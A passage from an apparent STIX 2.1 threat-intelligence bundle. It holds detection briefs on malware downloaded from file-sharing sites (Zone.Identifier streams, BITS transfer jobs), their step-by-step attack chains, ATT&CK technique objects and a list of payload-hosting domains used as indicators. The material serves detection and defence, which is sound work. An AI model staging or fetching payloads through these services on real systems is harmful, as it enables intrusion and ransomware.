legitimate software, or exploitation of a vulnerable internet-facing application, granting the attacker initial execution capabilities on a target system.\n2.  The attacker utilizes the initial foothold to stage a secondary payload download, often calling out to publicly available and trusted-looking file or paste-sharing services to host the malicious artifact.\n3.  A malicious script or binary on the compromised system initiates a download of a file from a well-known public file-sharing domain (e.g., `githubusercontent.com`, `mega.nz`, `cdn.discordapp.com`).\n4.  The downloaded file arrives with a suspicious scripting extension (such as `.bat`, `.cmd`, or `.ps1`) and inherently creates an Alternate Data Stream (ADS) named `Zone.Identifier`, marking its origin from the internet.\n5.  The system records the creation of this file and its associated `Zone.Identifier` stream, indicating an external download of potentially executable content.\n6.  The attacker then attempts to execute this downloaded script using a command and scripting interpreter (e.g., PowerShell, cmd.exe), often through a user interaction or an automated mechanism.\n7.  Successful execution leads to the establishment of persistent access, full command and control capabilities, data exfiltration to attacker-controlled infrastructure, or the deployment of further malware such as ransomware.\n\n## Impact\n\nIf malicious script files downloaded from public file-sharing domains are executed, organizations face significant risks including full system compromise, network lateral movement, and data exfiltration. Attackers can leverage these initial access points to deploy ransomware, steal sensitive information, or disrupt critical operations. The use of legitimate services makes these attacks harder to detect at the network perimeter, increasing the likelihood of successful execution and subsequent damage. The impact often includes financial loss due to business disruption, regulatory fines, and reputational damage. While no specific victim numbers are available for this generic detection, such techniques are widely employed across various sectors by numerous threat actors.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Unusual File Download From File Sharing Websites - File Stream\" to your SIEM and tune for your environment to detect suspicious file downloads.\n*   Ensure Sysmon `EventID 15` (FileStreamCreated) logging is enabled and collected for all Windows endpoints to activate the detection rule.\n*   Investigate alerts generated by the rule for `TargetFilename` values ending in `:Zone` combined with suspicious extensions (`.bat`, `.cmd`, `.ps1`) originating from `Contents` containing known file-sharing domains.\n*   Educate users on the risks of downloading and executing files from untrusted sources, even if hosted on legitimate platforms, as these are frequently used in phishing and malware delivery schemes.\n",
      "published": "2026-07-03T15:05:16Z",
      "labels": [
        "file-download",
        "delivery",
        "windows",
        "defense-evasion",
        "command-and-control",
        "execution"
      ],
      "object_refs": [
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4efb3b65-eef2-5281-a45f-79aa063cf151",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6df2896a-ef95-5417-b21a-dc6fac19865d",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6df2896a-ef95-5417-b21a-dc6fac19865d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious File Download from File Sharing Websites - Alternate Data Stream Detection",
      "description": "## Overview\n\nThis brief details a detection focused on identifying highly suspicious file downloads from commonly abused file-sharing and pastebin websites. Attackers frequently leverage legitimate services like GitHub, Mega.nz, or various paste sites to host malicious payloads, making it difficult for traditional network filtering to distinguish between benign and malicious traffic. The detection specifically targets downloads of executable or script-like files (e.g., .exe, .dll, .hta, .vbs) that trigger the creation of a 'Zone.Identifier' Alternate Data Stream (ADS) on Windows systems. This ADS indicates the file originated from an untrusted internet zone, serving as a critical indicator when combined with suspicious file types and source domains. This behavior is a common initial access or payload delivery method, bypassing some security controls by using trusted services.\n\n## Impact\n\nSuccessful exploitation following such a download typically leads to initial compromise of the endpoint. The downloaded file, if executed, could be any form of malware, including ransomware, information stealers, or remote access Trojans (RATs), granting attackers unauthorized access to the victim's system and potentially the broader network. This method is often used for targeted attacks against individuals or organizations, as attackers can tailor the payload and social engineering lures. The impact includes data exfiltration, system damage, lateral movement, and financial loss, contingent on the specific payload delivered by the attacker.\n\n## Recommendation\n\n*   Deploy the Sigma rule in this brief to your SIEM and tune for your environment.\n*   Ensure Sysmon logging, specifically for `FileStreamHash` events (Event ID 21), is enabled on all Windows endpoints to capture the necessary telemetry for the rule.\n*   Consider implementing network-level blocking or content filtering for the domains listed in the `selection_domain` of the provided Sigma rule, especially for environments where access to these sites is not business-critical, to prevent initial download attempts.\n",
      "published": "2026-07-03T15:04:08Z",
      "labels": [
        "file-download",
        "malware",
        "initial-access",
        "defense-evasion",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a"
        },
        {
          "source_name": "reference",
          "url": "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "BITS Jobs",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1197",
          "url": "https://attack.mitre.org/techniques/T1197"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--529d31b9-1890-540f-a73d-630cc9f05640",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41bf1dae-7c21-59ed-8c6a-efd5908bf4b7",
      "target_ref": "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b14ff34-2bb4-5152-a475-44f36385a65b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41bf1dae-7c21-59ed-8c6a-efd5908bf4b7",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1071",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--694e8b0a-18f1-59c3-a3bc-3756cb1e6e20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--41bf1dae-7c21-59ed-8c6a-efd5908bf4b7",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--41bf1dae-7c21-59ed-8c6a-efd5908bf4b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "BITS Transfer Job Downloads from File Sharing Domains",
      "description": "## Overview\n\nThe Windows Background Intelligent Transfer Service (BITS) is a legitimate component of the operating system designed for asynchronous, prioritized, and throttled transfer of files between machines. Threat actors frequently abuse BITS to download additional malicious tools, payloads, or command and control (C2) configurations onto compromised systems. This technique allows them to blend in with legitimate network traffic, as BITS often utilizes standard HTTP/HTTPS protocols and can bypass some traditional network defenses. The observed activity involves BITS transfer jobs specifically downloading files from popular, legitimate file-sharing or cloud storage domains, such as `githubusercontent.com`, `cdn.discordapp.com`, `mega.nz`, and `storage.googleapis.com`. This approach provides attackers with a relatively trusted channel to stage and retrieve their malicious assets, making detection more challenging. The technique has been observed in campaigns by ransomware groups like Hive, Conti, and AvosLocker, as well as nation-state actors like Mint Sandstorm targeting high-profile individuals.\n\n## Attack Chain\n\n1. An adversary gains initial execution on a target system through various means (e.g., exploiting a vulnerability, phishing).\n2. To avoid detection and ensure reliable payload delivery, the attacker decides to use a trusted Windows service for ingress.\n3. The attacker programmatically (e.g., via PowerShell or a custom tool) or through `bitsadmin.exe` creates a new BITS transfer job.\n4. The BITS job is configured to download a malicious executable or script from a URL hosted on a legitimate, but abused, file-sharing or cloud storage service (e.g., `anonfiles.com`, `mega.nz`).\n5. The attacker initiates or schedules the BITS job, allowing the download to proceed in the background, resilient to network interruptions.\n6. The BITS client successfully transfers the malicious file to a local staging directory on the compromised host. This activity generates a BITS Client Event ID 16403.\n7. The attacker then executes the newly downloaded payload, which could be anything from a backdoor, ransomware, or additional reconnaissance tools.\n8. This leads to further compromise, such as data exfiltration, lateral movement, or the deployment of ransomware, achieving the attacker's final objective.\n\n## Impact\n\nSuccessful exploitation using BITS for ingress typically results in the stealthy delivery and execution of secondary payloads. This can range from installing persistent backdoors for long-term access, deploying ransomware to encrypt critical data and extort payment, to exfiltrating sensitive information. The use of legitimate file-sharing services and BITS makes it harder for security teams to differentiate malicious activity from benign operations, leading to delayed detection and containment. Campaigns leveraging this technique have impacted various sectors, including universities and research organizations, indicating a broad targeting scope. The ultimate damage depends on the nature of the delivered payload, but it often includes financial loss, reputational damage, and operational disruption.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"BITS Transfer Job Download From File Sharing Domains\" to detect suspicious BITS activity targeting common file-sharing domains.\n*   Ensure BITS client operational logs (Event ID 16403) are enabled and collected in your SIEM for comprehensive monitoring of file transfers.\n*   Review network egress policies to restrict direct access to known file-sharing and cloud storage services from non-essential endpoints, where feasible, to mitigate the risk of BITS abuse.\n*   Implement application whitelisting to prevent the execution of unauthorized payloads downloaded via BITS or any other method, thereby limiting the impact of successful ingress.\n",
      "published": "2026-07-03T15:03:10Z",
      "labels": [
        "persistence",
        "execution",
        "defense-evasion",
        "ingress-tool-transfer",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--477183ac-e0ef-567d-be60-d5cbb114344b",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md"
        },
        {
          "source_name": "reference",
          "url": "https://twitter.com/malmoeb/status/1535142803075960832"
        },
        {
          "source_name": "reference",
          "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2964a832-32d9-5a89-bb63-c62595fed05f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: githubusercontent.com",
      "pattern": "[domain-name:value = 'githubusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--857d7d69-6981-5968-b6f6-c05f16b688bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--2964a832-32d9-5a89-bb63-c62595fed05f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--20c627cf-69e1-5b7d-8409-fb112f44702b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 0x0.st",
      "pattern": "[domain-name:value = '0x0.st']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b11416b-9109-5427-8464-377637cea5da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--20c627cf-69e1-5b7d-8409-fb112f44702b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--796b9f27-f775-5409-8a2c-092bed1bf69c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anonfiles.com",
      "pattern": "[domain-name:value = 'anonfiles.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0f8c312b-06a9-59ef-8cd4-1605b98947bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--796b9f27-f775-5409-8a2c-092bed1bf69c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2bbcb387-8abd-5e10-af87-7a1972f5ea79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bashupload.com",
      "pattern": "[domain-name:value = 'bashupload.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf3d626d-39fd-5ef0-b4db-8e89f8af49dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--2bbcb387-8abd-5e10-af87-7a1972f5ea79"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dbd0231f-a7c7-5fc2-9a91-34642cb8d570",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ca51088-1ae9-53cd-a753-04511bf057df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--dbd0231f-a7c7-5fc2-9a91-34642cb8d570"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--80aa4676-5d20-5c0b-81b6-bf07848fc6f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: chunk.io",
      "pattern": "[domain-name:value = 'chunk.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--edf1179e-06aa-50c4-bfa1-e75a6ebb5aa5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--80aa4676-5d20-5c0b-81b6-bf07848fc6f0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ef761d3a-8fb0-53be-9d53-4bdb1f117e4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ddns.net",
      "pattern": "[domain-name:value = 'ddns.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f630566c-f591-5957-94ea-a5885e04431c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--ef761d3a-8fb0-53be-9d53-4bdb1f117e4c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--342cd2b7-67d4-57e7-b552-c6f3129f2883",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dl.dropboxusercontent.com",
      "pattern": "[domain-name:value = 'dl.dropboxusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a1d5c7a-f326-52b8-97ce-c58762d74c0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--342cd2b7-67d4-57e7-b552-c6f3129f2883"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d4302876-0fc7-528e-a0ac-fdb6fa386961",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ghostbin.co",
      "pattern": "[domain-name:value = 'ghostbin.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fdf29c8f-3528-5438-812a-d9cf6ad92028",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--d4302876-0fc7-528e-a0ac-fdb6fa386961"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3f408fbc-4329-51a0-befb-e522aed9dce7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b55ba55-70e2-5200-901e-d86bad2bc2ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--3f408fbc-4329-51a0-befb-e522aed9dce7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7ddabda8-c4c5-544a-8b0d-b7eef324efe0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: glitch.me",
      "pattern": "[domain-name:value = 'glitch.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00d4f9c3-78e5-5f73-8fb6-37611c71b94d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--7ddabda8-c4c5-544a-8b0d-b7eef324efe0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0c3adba0-0fcb-5314-89b0-3304b9d5b87c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gofile.io",
      "pattern": "[domain-name:value = 'gofile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c78caf15-8cfc-55a4-aa4a-34e5ac2940d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--0c3adba0-0fcb-5314-89b0-3304b9d5b87c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2f59bf6a-8948-5193-9b61-f85275db0b03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hastebin.com",
      "pattern": "[domain-name:value = 'hastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c893a48e-37b0-5f14-af15-0907123f2461",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--2f59bf6a-8948-5193-9b61-f85275db0b03"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fa673742-cf10-5561-a401-30cfe87e9c3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mediafire.com",
      "pattern": "[domain-name:value = 'mediafire.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa9a71ef-375f-536d-8f93-0ad24bbd1c79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--fa673742-cf10-5561-a401-30cfe87e9c3e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1ee7bfb4-e31e-53ba-9bf2-a96b35e13e1d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mega.nz",
      "pattern": "[domain-name:value = 'mega.nz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24749169-27dd-5427-8223-6a509441f52a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--1ee7bfb4-e31e-53ba-9bf2-a96b35e13e1d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--18371ee7-7927-5153-aeb0-9ea6f0be1728",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: onrender.com",
      "pattern": "[domain-name:value = 'onrender.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56292778-9911-5fa7-9bbb-061037b8ead6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--18371ee7-7927-5153-aeb0-9ea6f0be1728"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4fb047b3-5fac-5a1f-ad17-1674b876f078",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pages.dev",
      "pattern": "[domain-name:value = 'pages.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63ee723c-226a-55d3-8abd-0983a6fa1ad5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--4fb047b3-5fac-5a1f-ad17-1674b876f078"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--592448c3-2451-5522-b29d-05ad7a193325",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: paste.ee",
      "pattern": "[domain-name:value = 'paste.ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91aaaee8-5f81-53a5-961e-2d74612d2890",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--592448c3-2451-5522-b29d-05ad7a193325"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c7c9a0dc-d0cf-5197-8a41-475c4c9f4480",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.com",
      "pattern": "[domain-name:value = 'pastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bbd15fc3-be7e-554c-a2b3-1897b5c576b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--c7c9a0dc-d0cf-5197-8a41-475c4c9f4480"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4a9ad7c3-9e88-5bdb-a2b7-d78b58b39339",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.pl",
      "pattern": "[domain-name:value = 'pastebin.pl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7837b869-8c77-535a-bc8d-6054e9fbe70d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--4a9ad7c3-9e88-5bdb-a2b7-d78b58b39339"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d02a4654-f1f9-5b95-92bf-d6c379f1b4c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastetext.net",
      "pattern": "[domain-name:value = 'pastetext.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2bb29900-4e3d-5bfe-8660-b0a9399eaa99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--d02a4654-f1f9-5b95-92bf-d6c379f1b4c1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6ac8d397-1822-5776-9bac-c3768e2f526a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.com",
      "pattern": "[domain-name:value = 'privatlab.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ba74ded7-4804-502a-98de-9c5de7f7e52d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--6ac8d397-1822-5776-9bac-c3768e2f526a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2681172f-071b-5f49-9226-230d49a3e925",
